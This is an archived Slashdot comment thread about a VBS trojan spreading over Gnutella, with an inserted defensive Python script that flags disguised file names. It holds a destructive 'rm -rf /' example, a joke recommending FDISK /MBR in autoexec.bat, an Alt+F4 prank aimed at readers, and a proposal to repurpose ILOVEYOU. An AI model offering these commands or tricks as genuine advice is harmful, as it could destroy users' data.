      I believe that a very famous science fiction author (whose name escapes me) once said:

      "Never attribute anything to malice that can be accounted for by stupidity."

      --

      Wah!

    5. Re:Conspiracy? by pq · · Score: 1
      I believe that a very famous science fiction author (whose name escapes me) once said: "Never attribute anything to malice that can be accounted for by stupidity."

      This is Hanlon's razor (not Heinlein): "Never attribute to malice that which can be adequately explained by stupidity."

      --
      "I will take the Ring," he said, "though I do not know the way."
    6. Re:Conspiracy? by kz45 · · Score: 1

      What you don't realize is that many features in Windows (98 at least) require VBScript/JavaScript. Do a search for *.htt (some are hidden files) to see what I mean....

      It was Microsoft's answer to totally integrate IE within their OS.

    7. Re:Conspiracy? by AstroJetson · · Score: 1

      Is it just me, or are there more & more viruses/trojans crawling out of the woodwork of late?

      Seems that way to me too. I think the real potential of VBS is just now being realized.

      --
      Admit nothing, deny everything and make counter-accusations.
    8. Re:Conspiracy? by trog9000 · · Score: 1
      Microsoft more than likely has their hands full coding the next release of their megavirus, which they sell as an operating system.

      Sorry to be pedantic, but Microsoft doesn't write viruses...they write trojans...nasty MBR overwriting trojans at that...

      (Got important data stored in my MBR ya know...usually takes me a few tries to remember which partition is supposed to be mounted on / )

    9. Re:Conspiracy? by MrEd · · Score: 1
      Hanlon, Heinlein, close enough eh?

      Thanks for the correction.

      --

      Wah!

    10. Re:Conspiracy? by Signal+11 · · Score: 3
      Or am I just paranoid, and it's all coincidence?

      Just stay online for a few more minutes and I'll have the answer for you. Also, pay no attention to the new icon in your system tray...

    11. Re:Conspiracy? by Anonymous._.Coward · · Score: 1
      What with all the fuss over Metallica, Dr. Dre and Napster I wonder who wrote this worm? Surely a really good way to scare people off using these file sharing/copyright infringement applications would be to write a worm or two, release them and scare the general public into never sharing files with strangers again.

      I am paranoid and it's no coincidence.

      --

      take a triptonica to subthunk

    12. Re:Conspiracy? by IHateEverybody · · Score: 2


      Is it just me, or are there more & more viruses/trojans crawling out of the woodwork of late?
      Is it an underground effort by the Linux zealots to undermine Windows? Is it a cunning ploy by Micro$lop to get people to buy W2K?
      Or is it the anti-virus vendors drumming up sales?
      Or am I just paranoid, and it's all coincidence?


      It's the flavor of the month combined with typical sensationalist "journalism." Combine big, largely made up numbers ("ILOVEYOU virus causes $5 billion in damage to U.S. corporations!") with the current headline addicted nature of news in the United States and you've got the press hyping up every new bug as a potential digital Chernobyl. With the Elian story winding down and no recent spectacular celebrity deaths, the press will continue jumping on every virus as a potential huge ratings/eyeballs grabbing headline for the time being.

      --
      Does this .sig make my butt look big?
    13. Re:Conspiracy? by ethereal · · Score: 1
      Is it an underground effort by the Linux zealots to undermine Windows?

      I don't think any help from Linux zealots has been necessary - Windows has plenty of built-in features that undermine it on their own :)

      --

      Your right to not believe: Americans United for Separation of Church and

    14. Re:Conspiracy? by carlos_benj · · Score: 1
      "Or am I just paranoid, and it's all coincidence?"

      I think it's a conspiracy by the paranoid so that they can feel better about all the time they've wasted worrying about other things.

      carlos

      --

      As a matter of fact, I am a lawyer. But I play an actor on TV.

    15. Re:Conspiracy? by deefer · · Score: 1
      Heh! No there isn't!!!
      W17h m1 31337 h@xx0r 5k1ll2, I c4n 533 j00 0n 127.0.0.1, Signal_11 !!!
      S74nd 8y 4 53r10u5 h@xx0r1n9!!! 1 w1ll 8r1n9 joo d0wn 4nd MSDOS j00!!!




      For the humour-impaired, I'm kidding, OK?
      Don't you wish we lived in a world where disclaimers like this weren't necessary?

      --

      Strong data typing is for those with weak minds.

    16. Re:Conspiracy? by IronChef · · Score: 1


      Let's hear it for Microsoft's Virus Building Script!

      Why can't they issue a security patch for Windows that adds a control panel setting for VBS? By default, the system should DISALLOW the execution of *.VBS files. Turn it on if you are an author and you know what you are doing.

      I just did a quick search of my C drive... there are 6 VBS files, all in a samples directory. This does not look like a technology that needs to be enabled by default. If the file type association for VBS was clobbered, or if VBS files were neutered in some other way, would this have any negative impact on Windows? Someone must know.

      Here's an idea: someone should modify the ILOVEYOU virus so that it does the following:

      - Reads address books and replicates itself as usual

      - On the "victim" machine, it DISABLES the future execution of Visual Basic Scripts. The virus that disables future viruses!

  32. Re:Linux enters the mainstream? by Sancho · · Score: 2

    VBS is good just as any scripting language is good. You can script in it. I won't go as far as to say it's as good as Perl or other scripting languages, but it's used for similar purposes. Inherently, VBScript isn't bad. It's no worse than any other scripting language. The problem is a combination of things, mostly OS and OS settings.

  33. But how is it pronounced? by Neuracnu+Coyote · · Score: 1

    I was reading a Newsweek article (linked off the wego Gnutella site) that claims it's "pronounced New-tella." Is it?

    I always pronounced it like the spread, with the G being silent: nuh-TEL-uh.

    Another friend claimed that he pronounced it like other Gnu software projects, giving the G sound: guh-new-TEL-uh.

    Thoughts?

    --
  34. Re:The Worm is a HOAX! by Sune+DK · · Score: 1


    Forget I ever wrote that!

  35. Re:hrm by extrasolar · · Score: 2

    Why, again is it stupid? I know it is stupid but, why?

  36. Re:Not a worm! by envelopush · · Score: 1

    Yes, they both entice user to run the worm/trojan.

    The difference here is...

    Once the user has run the ILOVEYOU worm, it copies itself as multiple files on the host machine *and* uses Outlook to self-propagate to other people's machines.

    When the user runs Gnutella VBS trojan, it copies itself as multiple files on the host machine, does not send itself to others. It is merely *available* to others via Gnutella.

  37. Re:Gnutella is closed source, hence not secure by Chiasmus_ · · Score: 1

    I just don't think the open source movement has much to do with this. Sorry, *nix guys.

    An environment where people anonymously share executable files is almost by definition insecure. I guess there are still people out there that figure if it says "Starcraft_Crack.CRACK.VBS", it's a Starcraft crack.

    Personally, I think using Gnutella is a little bit like sailing from port to port and having unprotected sex with all the native prostitutes.

    --
    "Beware he who would deny you access to information, for in his heart he deems himself your master."
  38. I don't have any Moderator Points, But... by Chiasmus_ · · Score: 1

    Good post, man.

    --
    "Beware he who would deny you access to information, for in his heart he deems himself your master."
  39. Misunderstanding by mccormick · · Score: 2

    I think people are misunderstanding this situation.. Some are saying that if Gnutella were opensourced, a problem like this wouldn't exist (for various reasons.)

    This is incorrect. First of all, Gnutella's network protocol (half of which is based on HTTP) is documented, and a variety of both open and closed source clients exist.

    This trojan doesn't use any kind of a backdoor in Gnutella technology. Rather, it's spread by the users themselves. They download a file (like 'collegesex' or whatever), which is actually a .vbs script, double click it, and then the trojan does its stuff.

    So, this is no problem with Gnutella. It's just users who don't have a strong enough security background, and who can't discern scripts from other types of files.

    This can happen to anyone, on any OS. Just so happens that Microsoft's are the easiest to use, and generally have the users that would fall for it.

    Hope this clears up some misinformation. Guys/girls, please try not to jump to conclusions about everything (like how open source would have prevented this.)

    --
    Pete
    1. Re:Misunderstanding by hal200 · · Score: 1

      Let's just for the sake of argument consider it not as a 'conclusion' but more as a 'working theory'...Up until Melissa, the 'working theory' was that you couldn't get a virus by opening an email...now, as we all know, it's a whole new ballgame.

      So, for the time being, until I'm proven wrong, I'll shake my head and say "I'm glad I run Linux" when I hear about the VBS worm du jour...

      Speaking from a lay-physics point of view, it's like the THEORY of Relativity...not the LAW of Relativity...It works, but nobody has proven yet that it will ALWAYS work...

      --

      I just want to take over the world...Why does that automatically make me EVIL?

  40. Re:malicious no, a moron,.. by Cally · · Score: 2
    Something I always wanted to do back when I worked in a Windows shop -- back up the standard IT dept warnings about not opening attachments by writing a simple program to mail us back saying "User x just opened an attachment." After a round of public humiliations everyone would be told that this would be a continuous policy, and would henceforth be a disciplinary offence.

    Naturally the idea was a complete non-starter. The whole reason they used Outlook in the first place was so they could send each other pretty HTMLified mail with, like, colours ! and fonts ! and stuff; plus they were always mailing 100Mb Excel and Access docs around to each other.
    Camaron de la Isla 'When I sing with pleasure, my

    --
    "None are more hopelessly enslaved than those who falsely believe they are free." -- Goethe
  41. Re:malicious no, a moron,.. by rifter · · Score: 1

    That reminds me of the guy who said "I didn't pay $5000 to have to read a f*%#ing manual!" Believe it or not, we are going to have to eventually design idiot proof computers that fix themselves. This is the only way to cut down on support costs and truly get computers in the hands of the masses.

    Of course such an animal is, so far, a fantasy.

  42. Re:A point lost by jjohn · · Score: 1

    MS Office isn't truly to blame. The OS is responsible for file ACLs. Office would be fine (for some values of 'fine') on Linux. Having a scripting language to bind separate applications together is a good thing. That's the area python, perl and tcl fill in UNIXland now.

    While I can't imagine a self-respecting X user with Mr. Clipit, I can see Mr. Hanky answering your MS Office help questions.

    I run a Linux desktop at work. While I can use Star Office or AbiWord to open many MS Office files, I find now that I need to make a little UI with Access which uses ODBC to connect to MySQL. Now, I need a PeeCee. It would be nice to develop this app on Linux, then ship the file to my windows users. Oh well.

  43. Re:Attention ZDNet readers by Stone+Portman,+CGI · · Score: 1

    I have developed a simple test to check your virus and computer IQ. You get entered into a drawing for a $1000 bill, just for entering. To take the test, press Alt+F4, now.

    I want to take the test, but nothing happens! Now, I am not some newbie dumbass, I have been reading ZDNN for 4 years, which makes me pretty much technically 31337.

    I carefully follow the directions, and use four fingers to press the Alt, +, F4, and Shift (required for the +) keys and nothing happens. Plus I also tried using the keypad + without the Shift key.

    Dumbass Linux geeks always pretend to be so smart, hahaha you fucked up this time.

  44. So VIC20 GNU code would be Linux code???? by bbcat · · Score: 1

    GNU != Linux
    You could write GNU software that works only
    on the Vic 20. It is not because you claim
    in the comments that you are releasing the
    code to the world that it becomes Linux code.

    As for the vbs scripts in question get real,
    it works only on winblows and even if you were
    stupid enough to fix them to run on the
    Linux basic you still couldn't do shit on
    Linux for at least one of these four reasons

    1-As a user you have little to no access
    to dangerous area
    2-You don't have a stupid registry à la winblows
    3-Scripts can't run unless you set them
    as executable
    4-Basic is not installed on Linux unless you're
    moron enough to find it and install it yourself.

    1. Re:So VIC20 GNU code would be Linux code???? by Biff+Cool · · Score: 1
      He wants you to call it GNU/Linux instead of Linux not instead of GNU.

      --

      Conscience is the inner voice which warns us that someone may be looking.
      -- H. L. Mencken

    2. Re:So VIC20 GNU code would be Linux code???? by bbcat · · Score: 1

      >Yet another indicator that there is no friggin'
      >difference between the two.

      Your conclusions are very much like the
      following one.

      L'homme descend de l'arbre
      Le singe descend de l'arbre
      Donc l'homme descend du singe.

  45. Re:When will this run on linux by extrasolar · · Score: 2

    Compatability with Excel spreadsheets is the main reason, I heard.

    Do you use spreadsheets a lot?

  46. Re:Huh? by rifter · · Score: 1

    What culpability? this is a VBS file. It just happens to be distributed on gnutella, but it would only work for Windows, and is only harmful because of Microsoft Closed Source == Closed Mind security, or lack thereof.

    Linux is not even involved here.

  47. Re:...but remember, Gnutella isn't actually weak.. by Mr.+Slippery · · Score: 2
    Also, how would I go about checking a binary file I downloaded to make sure it's what I think it is and not an insidious worm?
    There are a few possibilities:
    • Download only from trusted sources. Hard to do with Gnutella, but practical with FTP or HTTP. Yes, the source could be compromised, but such a compromise would be quickly found and stopped. Don't trust your life that a download from, say, redhat.com is what it purports to be, but for most people the risk is minimal.
    • Download only files cryptographically signed by a trusted party. You've still got the problem of "who do I trust, and what if they are fooled?" but it's much more difficult to forge a cryptographic signature than to crack a server and put up a malicious binary, and this can be used with anonymous-source downloads (i.e., Gnutella).
    • Download only source, and check it over yourself. That will only protect you against attacks you are knowledgeable enough to find, and would get tedious real quick.
    • Run the binary in a sandbox or jail, where what it can do is limited. But that also means that the usefulness of the program is limited.
    --
    Tom Swiss | the infamous tms | my blog
    You cannot wash away blood with blood
  48. Here goes my Karma, But.... by DgtlGhost · · Score: 1
    How the Hell is this insightful? "Open Source it!" is not really a brilliant statement! It won't solve the Windows inter-reliability problem that caused this issue! Now, open sourcing Windows, or IE or OutLook might allow people to turn those into more functional programs, but it won't change Gnutella any. Gnutella is plenty secure, and it's actually kinda funny to me that after all the warnings about opening VBS from Email, people are purposely downloading them now from Gnutella...
    lUsers....

    -Earthman

  49. Re:my favorite is the html generating scripts by AugstWest · · Score: 2

    I think it's because the Beatles were already the second coming, NKOTB was the third, and the Maurice Star boy groups (the Bel Biv D'Jours) kind muck up the numbers from there.

    Maybe we need, like, a Sony Music Corp Voice of a Generation, and a Warner Brothers Voice of a Generation, a Geffen Voice of a Generation and so on. That way it'd be easier to keep things straight.

  50. uh-duh by nimmo · · Score: 1
    Correct me if I'm wrong, but this virus is a VBS file. It can't do any damage - in fact, it does no damage as it is - only if you open the file and execute the script. So, what's the big deal?

    Gnutella users: continue, ignore this hype, and just make sure you know what you're doing before you open a file.

  51. Re:...but remember, Gnutella isn't actually weak.. by TheZork · · Score: 1

    Yeah, but on a multi-user OS like Linux, it's tougher for a stupid user (on a properly configured system) to hose the OS or other users' stuff. Windows makes it really tough for the lame among us to protect ourselves from... us.

  52. anonymous file swapping--no good for executables by jetson123 · · Score: 2

    Gnutella doesn't have much in the way of authentication or signatures for the files people download. That isn't a problem for MP3's--if you thought you downloaded Metallica and you get Pocahontas instead, nothing has been damaged. But for executables and some kinds of documents, it's a big problem.

  53. Re:Same vien as ILOVEYOU by earache · · Score: 1

    Umm no.

  54. Attention ZDNet readers by jabber · · Score: 3

    I have developed a simple test to check your virus and computer IQ. You get entered into a drawing for a $1000 bill, just for entering.

    To take the test, press Alt+F4, now.

    --

    -- What you do today will cost you a day of your life.
  55. Re:malicious no, a moron,.. by quonsar · · Score: 1

    The whole reason they used Outlook in the first place was so they could send each other pretty HTMLified mail with, like, colours ! and fonts ! and stuff...

    And that, folks, is the sum total of Windows' contribution to 'productivity'. Plain text business documents would suffice in damn near any situation, but PHB's have gotten hooked on those 'pretty' Word and Excel docs and everyone down the line wants to please them. I have repeatedly observed that much more time is spent over formatting than conveying content, even down to the lowliest aide typing a memo. Powerpoint is an excellent example of this. It's ludicrous.

    ======
    "Rex unto my cleeb, and thou shalt have everlasting blort." - Zorp 3:16

  56. here's a hint by / · · Score: 1

    open mouth

    remove foot

    insert sense of humor

    chew and swallow

    --
    "If one is really a superior person, the fact is likely to leak out without too much assistance" -- John Andrew Holmes
  57. Re:CODE... by camadas · · Score: 1

    You got to love these open source worms/virus, whatever. Will it be GPLed ?

  58. Re:...but remember, Gnutella isn't actually weak.. by zeck · · Score: 2

    Be smart, don't run anything from an untrusted source without checking it first.

    Isn't all of Gnutella pretty much an untrusted source?

    Also, how would I go about checking a binary file I downloaded to make sure it's what I think it is and not an insidious worm? Size could be a clue sometimes, but not all the time, especially if the programmer is smart and names it to look like appropriately sized binaries. Would virus protection software catch something like this?

  59. Re:Virus hackers becoming Microsoft'ed? by jbarnett · · Score: 2


    I remember when the CIH virus came out, I thought to myself "Damn that is pretty cool". I am not malice and I am sorry for the people that had their bios flashed cause of this, but you got to admit, that is at least (if nothing else) an interesting payload, compared to say "format C: /q"

    --

    "`Ford, you're turning into a penguin. Stop it.'" -THHGTTG
  60. Re:...but remember, Gnutella isn't actually weak.. by Chandon+Seldon · · Score: 1

    Windows doesn't differentiate between "view" and "execute". It uses the same command (double click) for both. Double clicking a .vbs file executes it, while double clicking a .txt file opens it in a viewer. Combined with the default Windows setting of "don't show extensions" this is an OS error if I ever heard one.

    On the other hand, this is another example of user stupidity. People have to be told that "You just don't run stuff from an untrusted source."

    The problem is, with Windows, that becomes "You just don't open stuff from an untrusted source."

    Hmm... I think this *is* an OS and application error. (Operating System for lack of View/Execute distinction, Applications such as MS Office for allowing data files to do system calls.)

    --
    -- The act of censorship is always worse than whatever is being censored. Always.
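
Added example (not part of the thread and not any poster's code): a Python triage of the file names in a shared download folder, modelling the behaviours discussed above, namely that Windows acts on a file's final extension while Explorer can hide it, plus the leading-space padding mentioned in an earlier comment. The extension lists and function names are assumptions, and the sample names are constructed from names mentioned in the thread.

```python
import os

# Assumption: illustrative, non-exhaustive list of extensions that Windows
# hands to a script host or program loader when the file is double-clicked.
RUNS_ON_OPEN = {".vbs", ".vbe", ".js", ".jse", ".wsf", ".wsh",
                ".bat", ".cmd", ".com", ".exe", ".pif", ".scr"}

# Assumption: extensions users treat as passive media or documents.
PASSIVE = {".mov", ".mpg", ".avi", ".mp3", ".jpg", ".gif",
           ".txt", ".doc", ".html"}


def displayed_name(filename):
    """Name shown when 'hide extensions for known file types' is enabled.

    Only the final extension is hidden, and only if it is a registered type
    (modelled here as membership in the two sets above).
    """
    stem, ext = os.path.splitext(filename)
    return stem if ext.lower() in (RUNS_ON_OPEN | PASSIVE) else filename


def triage(filename):
    """Return a list of reasons this name deserves a closer look."""
    reasons = []
    stem, ext = os.path.splitext(filename)
    ext = ext.lower()
    inner = os.path.splitext(stem)[1].lower()  # extension left visible
    if ext in RUNS_ON_OPEN:
        reasons.append("runs-on-open:" + ext)
        if inner in PASSIVE:
            # With extensions hidden, the name reads as a media file.
            reasons.append("decoy-extension:" + inner)
    if filename != filename.strip():
        # Leading or trailing whitespace used to sort to the top of a list.
        reasons.append("padded-name")
    return reasons


def scan(directory):
    """Return {filename: reasons} for every flagged file directly in directory."""
    report = {}
    for name in sorted(os.listdir(directory)):
        if os.path.isfile(os.path.join(directory, name)):
            reasons = triage(name)
            if reasons:
                report[name] = reasons
    return report


# Constructed sample names, based on names mentioned in the thread.
SAMPLE_NAMES = [
    "collegesex.vbs",
    "PamelaAndersonMovie.mov.vbs",
    "Starcraft_Crack.CRACK.VBS",
    " search keywords.html",
    "song.mp3",
]

if __name__ == "__main__":
    for sample in SAMPLE_NAMES:
        print(repr(sample), "shown as", repr(displayed_name(sample)),
              "->", triage(sample) or "no flags")
```

A name-based check says nothing about what a file with a passive extension actually contains; it only shows which files the shell would run rather than view.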
  61. Re:clearing things up by Nick_Psyko · · Score: 1

    GNUtella ? what does it mean? well it depends on how you express it... could be GNU teller like everyone else is saying but I think that it has nothing to do with GNU or Magic (Penn+Teller), I prefer the reasoning that someone could not think up a name and so looked in their 3:00am munchies cupboard and saw Nutella, Great,, Nutella. then whilst in the programming daze that so often envelops such coders the thought of great Nutella lost a few letters and became Gnutella... Sorry for the post that was not about any sort of virus/worm etc but I just thought that I had to splurge that rambling drivel all over /. :O)

    --
    mountvol \\?\brain{dbe069b1-65ae-11d5-bab4-806d6172696f}\hu mor\
  62. Where to get Gnutella by goingware · · Score: 2
    You can download Gnutella for a variety of platforms from the Gnutella home page.

    Some come with source. My favorite so far is gtk_gnutella that I run on Linux.

    The one problem I notice with Gnutella is that if I leave it running for a while - even idle - I will eventually need to reboot my cable modem.

    You will need an initial host to begin connecting to GnutellaNet. One is always shown on the Gnutella home page.

    --
    -- Could you use my software consulting serv
  63. Boot Sector Virus Protection by Anonymous Coward · · Score: 1

    For added protection from boot sector viruses on your Windows machine add the following line to your autoexec.bat file:

    FDISK /MBR

    This will automatically eliminate certain known boot sector viruses on your machine. Said viruses have the effect of transforming your machine into a 1980's-era time sharing system.

  64. Anyone that downloads a vbs file on gnutella... by Syllepsis · · Score: 1

    Good god...anyone who is so absurdly stupid to download a vbs file on gnutella and then actually runs the thing without looking at it deserves whatever they get.

    Distributed file sharing is NOT good for trading executable code. No one should ever just download some script from some unknown host and then just run it without examining what it does.

    This is simply the digital equivalent of taking candy from strangers. Society needs to wake up to the handling of code downloaded from the net. If someone comes up to you on the street and offers you a swig of some green liquid, do you take it? I hope not.

    This 'worm' is not a weakness in gnutella, windows, or any program whatsoever. This is just proof positive that people will run whatever crap comes to their machine without batting an eye.

    Now I am going OT: This is an issue of security education. One day, people will learn that computers are simply (and this is from a theoretical standpoint) hard to learn. Everyone wants a little text box that you can tell the computer exactly what to do and it will do it like that. We have had this technology for a long time. It is called bash. It works very well and is easy to use. However, one does not learn it in a few minutes.

    People who take the time and effort to learn how to properly use computers understand the raw power available in a few lines of code. They are very careful about naughty little scripts that go around the network. The other people don't know how to use computers, and should have devices that do not run executable code of any sort other than the five or so apps that they don't do anything stupid like get code from some random machine.

    1. Re:Anyone that downloads a vbs file on gnutella... by Graymalkin · · Score: 2

      What makes you think you're so superior a computer user? Ohhh, wow you can type things on a command line. That is really excellent, you ought to be commended. Oh wait a second, The command line is an interface to give the system instructions, not to actually process data. Raw power in a few lines of code, you would be hard pressed to do anything worthwhile merely from a command line. Moving files and writing the output of ls to a text file isn't my idea of raw power. Under your logic cars ought not have power steering or ABS brakes because people ought to learn how to live without them. Everyone ought to spend their time at home in front of a glowing screen like you do so they too can understand computers. Doesn't it suck to be a 45 year old virgin though?

      --
      I'm a loner Dottie, a Rebel.
  65. Re:clearing things up by Nick_Psyko · · Score: 1

    sorry for the not reading the threads disease, I just posted the same thing just below you!!!

    ARRRRGGGGHHHH Must absorb more of the page.....

    --
    mountvol \\?\brain{dbe069b1-65ae-11d5-bab4-806d6172696f}\hu mor\
  66. Re:...but remember, Gnutella isn't actually weak.. by zeck · · Score: 1

    But there are so many ways of getting around virus protection software... No matter how current you keep your virus definitions, they're not going to detect a clever virus written yesterday. Sure, a patch will be out to detect it pretty quick, but by that time it might not matter.

  67. Re:malicious no, a moron,.. by / · · Score: 1

    People are capable of thinking but they have bought into the Apple and Microsoft hype that computers don't require thought so they refuse to think.

    And in response to this precise problem, Apple has for many months now been running public service announcements with the catchy slogan of "Think Different".

    --
    "If one is really a superior person, the fact is likely to leak out without too much assistance" -- John Andrew Holmes
  68. Re:...but remember, Gnutella isn't actually weak.. by zeck · · Score: 1

    Easy to say, but given the nature of a piracy service like Gnutella it might not be so practical.

  69. Re:clearing things up by TheMeld · · Score: 1

    setting privs on a script to 4755 will do jack. In linux, the setuid bit on scripts is ignored. If you want to run a script setuid, you have to have a special, setuid interpreter. This is how perl does this, via suidperl.
    -Matt

    --
    -Cheetah
  70. More Earthquakes? by Speare · · Score: 2

    I think news stories about attacks are like news stories about any calamity. Earthquakes, terrorist activity, droughts, illegal-alien smugglings, LAPD scandals, whatever.

    There isn't really a larger number of tornados per year, looking at the big picture. There are more people, settling in more areas, so more people reporting heretofore-unseen tornados.

    If a couple stories are on the same topic in a short time, a news service will develop a "focus" on such stories, and will pick those out from the newsfeeds like Associated Press.

    When it comes to people-induced tragedy, the news stories generate a lot of copy-cats. Columbine, Melissa, Oklahoma City, the list goes on.

    The fact that the news services sensationalize the stories, with big numbers ($5 billion cost, blah blah), it's worse. Those big numbers are what businesses are putting in their claims forms for insurance claims against lost business, whether they really lost that much business or not.

    --
    [ .sig file not found ]
  71. boobytrap by Skeezix · · Score: 1
    they should call it something new. call it a boobytrap -- that's what it really is anyway.

    I like that. Boobytrap it is.
    ----

  72. Self defeating policy by |DaBuzz| · · Score: 3

    They say don't download/run anything from a source you don't trust ... the question is, why develop a client to interact on a GLOBAL, utterly anonymous peer to peer file sharing network if you can only download stuff from people you KNOW and TRUST?

    It's kinda like saying ... "use this product to get access to files you never would have dreamed of, but don't ever download or run anything you can't get from a local friend."

    Kinda defeats the purpose doesn't it? Rather, it illustrates the inherent weakness in this whole system and how people's desire to steal software overrides their common sense of not dealing with anonymous users you can't trust.

    If someone on the street offered you an opened Coca-cola, who would be stupid enough to drink it? Change the Coca-Cola to Mad Dog 20-20 and almost any alcoholic would drink it showing that common sense is often thrown out the window to get what we think we want/need but what in a lot of cases is not good for us puts us (and in this case, our computers) at serious risk of harm.

    1. Re:Self defeating policy by god_of_the_machine · · Score: 2

      I think they are referring to executable files in this case. At worst, a MP3 or JPG or MOV will offend you... we all know the worst that a VBS can do.

      That's why you should use the "GLOBAL, utterly anonymous peer to peer file sharing network" to do what it was supposed to do (pirate music, video, etc)... not pick up .VBS files!

      -rt-

      --

      -rt-
      ** Evil Canadians are taking over the world. Learn about the conspiracy
  73. Re:Virus hackers becoming Microsoft'ed? by camadas · · Score: 1

    Remember the ones that used to corrupt the FAT table? Now THOSE were VIRUSES.
    I collect virus since the dos 3.3 days. I recall that most of the virus that corrupted FAT were the badly written ones or the bad modified rewrites.
    And of course the infamous DoubleSpace from DOS 6. THAT was great in the loss of data.

  74. Re:Gnutella security not related to closed source. by BigBlockMopar · · Score: 1
    Until gnutella opens its source, it will never be secure. They might be able to fake it, and claim security, but backdoors like this will always exist until there is a large team of dedicated users who can fix bugs and patch code.

    Nah, you're missing the point.

    First off, forgive my ignorance here, but I had thought that Gnutella was open source?

    Regardless, the true power of Gnutella is based on two factors. First and most important being the lack of a centralized server system for the RIAA/MPAA/etc to shutdown.

    But secondly, since it's not restricted to any file type, security of the executables downloaded is a user issue. Do you want Gnutella to ban VBS files? That would just hurt people wanting to transfer legitimate VBS scripts.

    In fact, Napster could be used to transfer this stuff. Just Wrapsterize it, give it an interesting title, and away it goes.

    How about banning executables?

    Again, that just hobbles the usefulness of the system and limits the user base.

    Unlike the constant Outlook fiascos, the only way to transfer this worm is to actually decide to download it from another user and then execute it, versus the Outlook model where it just appears in a user's mailbox. If you practise safe surfing, it's not an issue.

    --
    Fire and Meat. Yummy.
  75. Vx definitions revisited - its a Trorm by onepoint-o · · Score: 1

    The angry assertions by slashdot readers that this is "not a worm!" are a little unfair. A statement such as "well, it's not really a worm" might be a little more appropriate. It's more of a trojan with worm-like properties. This is a brand new animal, I believe. Doesn't a trojan that replicates- even if the mechanism of replication happens to require human assistance- deserve a name of its own? A worming trojan? A trorm? No one would deny that it doesn't implement the replication thing the same as your historical worms, but there's not really a classification for this type of animal yet. It all seems very wormy to me.

  76. Fun with the nuker by BlueUnderwear · · Score: 2
    Ummm... metal in a microwave,

    ... normally doesn't harm the microwaver. If shaped correctly, it may generate some sparks, but that's it. You can actually get some pretty effect by putting a CD in (please use a Windows CD for this, it won't play after this stunt).

    microwave started with nothing inside it

    Although using the nuker "empty" is not very good for it, it won't damage it either just from one time.

    drying paper towels in the microwave which then catch a light when you take them out

    Yes, the nuker is indeed a great tool when you run out of matches. Other ways include: pencils (pretty quick), bread (leave it in for a couple of minutes), chocolate (black chocolate works best: wait til it melted, then leave it for one more minute). Pencil mines are interesting too, but you need something disposable to prop them up against.

    And the classic: eggs (no fire, but count a quarter of an hour's work to clean away the mess), soap (use a very small quantity, unless you have a really large nuker).

    --
    Say no to software patents.
  77. Re:GNUtella only runs on *BSD, not Linux by Biff+Cool · · Score: 1

    It wouldn't even need to be in a sandbox all the time. Just cripple it by default. You know it's not that Windows can't be made secure it's just that it takes so much fucking longer to find all of the goddamn checkboxes that they hide to disable all of the default security holes, that you may as well just learn *NIX to begin with.

    Sorry it's Monday, and I hate VBScript


    --

    Conscience is the inner voice which warns us that someone may be looking.
    -- H. L. Mencken

  78. Really Clever?? Are you kidding? by jabber · · Score: 1

    Here, take this dirty syringe, full of unidentified liquid, and inject yourself with it... Done? I just infected you with a virus! Hahahaha!

    How is it 'really clever' to prey on the ignorance - and stupidity at this point - of people?

    The only thing that sets this trojan apart from those of 'days long gone' is the speed with which it can spread, and the trojan does nothing about that. It's the network, and the fact that it is populated by less and less technologically versed users, that makes this (and things like this) a threat.

    Let's thank the gods that the dangerous biological viruses, like Ebola, Magdeburg and a host of others, are relatively confined to the extremes of civilized society. If they were placed in the human analog of the Internet (Times Square on New Years Eve, or O'Hare Airport on a major holiday weekend, for example) we'd be done by now.

    Let's be thankful that all our virtual Times Square has to deal with is some dirty needles, and clueless newbies who insist on sticking themselves in the arse with them.

    --

    -- What you do today will cost you a day of your life.
  79. Re:Gnutella is closed source, hence not secure by rifter · · Score: 1

    The reason it is important to make VB secure is precisely caused by the fact you do not have to double-click on a file to start it. VBScript can be embedded in html email and other html sources, and Office docs. Corel is going to put it into wordperfect. So you open a file that says "resume.doc" and get infected. Or click on a link, or preview a message in Outlook. And then you are infected.

    If VBscript had a sane security model this would not be a problem. Bottom line, nothing that gets run automatically should have file access beyond a specified order.

  80. Re:hrm by evand · · Score: 1
    Why, again is it stupid? I know it is stupid but, why?

    One reason is that running as a normal user is somewhat more of a "sandbox." If I give you a file called "freeporn.sh" containing
    #!/bin/sh
    rm -rf /
    and you ran it as root, you'd delete pretty much everything on your system. Run as a user, it would only delete stuff that the user has permission to delete.
    Also makes you think a little bit more when you're about to do something. If you're su'ing into root to delete a directory, you're probably going to be paying more attention and may not just fire off an "rm -rf / home/jimmy." That's never a good thing to do ;)
  81. Re:This is proof that Linux is not immune by EnVisiCrypt · · Score: 1

    Hey man, gnutella doesn't = linux. Also, .vbs files work exclusively on winblows. Even then you have to be a dumb ass and have scripting enabled. Fact checking. look into it.

    --


    *everything* is Orwellian to cats.
  82. Re:Reminds me of this UNIX "virus" I recieved once by thomasj · · Score: 1

    The worst is that I got one, that drew money from my account. It contained a fill-out-the-blanks credit card payment slip. The e-mail instructed me to fill it out and return it, or my harddisk would be gone! I was so scared, that I didn't dare to ignore it, and now they draw $120 bucks a month on my mastercard. And there is nothing I can do about it.

    --
    :-) = I am happy
    :^) = I am happy with my big nose
    C:\> = I am happy with my OS
  83. 23 eh? by isolation · · Score: 1

    I guess Robert A. Wilson was right. I can't get away from it.

    --
    Free Unix? Free Windows. http://www.reactos.com
  84. gnutella is for windows. by Yarn · · Score: 1

    and is not open source. There are some open source clones, and I suspect these will not be affected.

    so nyah!

    TrollMark: 3/10

    --
    -Yarn - Rio Karma: Excellent
    1. Re:gnutella is for windows. by Biff+Cool · · Score: 1
      Actually they would be just as affected, it's just a file that shows up. You have to download it then run it yourself (Just like ILOVEYOU). Open Source can only go so far to protect people from their own stupidity.

      --

      Conscience is the inner voice which warns us that someone may be looking.
      -- H. L. Mencken

  85. Re:malicious no, a moron,.. by geekoid · · Score: 1

    Next time have it pull information off their system and display it. Really good if they have a 'money manager' like application.
    If seeing their credit card number flashing before them doesn't stop them, nothing will.

    --
    The Kruger Dunning explains most post on /. http://en.wikipedia.org/wiki/Dunning%E2%80%93Kruger_effect
  86. Re:...but remember, Gnutella isn't actually weak.. by hamjudo · · Score: 1
    Also, how would I go about checking a binary file

    Verify the MD5 checksum with the author or with someone who has checked the binary.

  87. Re:hrm by extrasolar · · Score: 2

    Umm. I can do the same thing in netscape and ncftp.

    "...and you ran it as root, you'd delete pretty much everything on your system."

    Why would I do a stupid thing like that? Give me *some* credit, will you?

    I just thought there was something special about IRC clients, like maybe letting many people on IRC know my IP address when I run as root or something.

  88. Re: VBA "virus builder's assistant" by kevin805 · · Score: 2

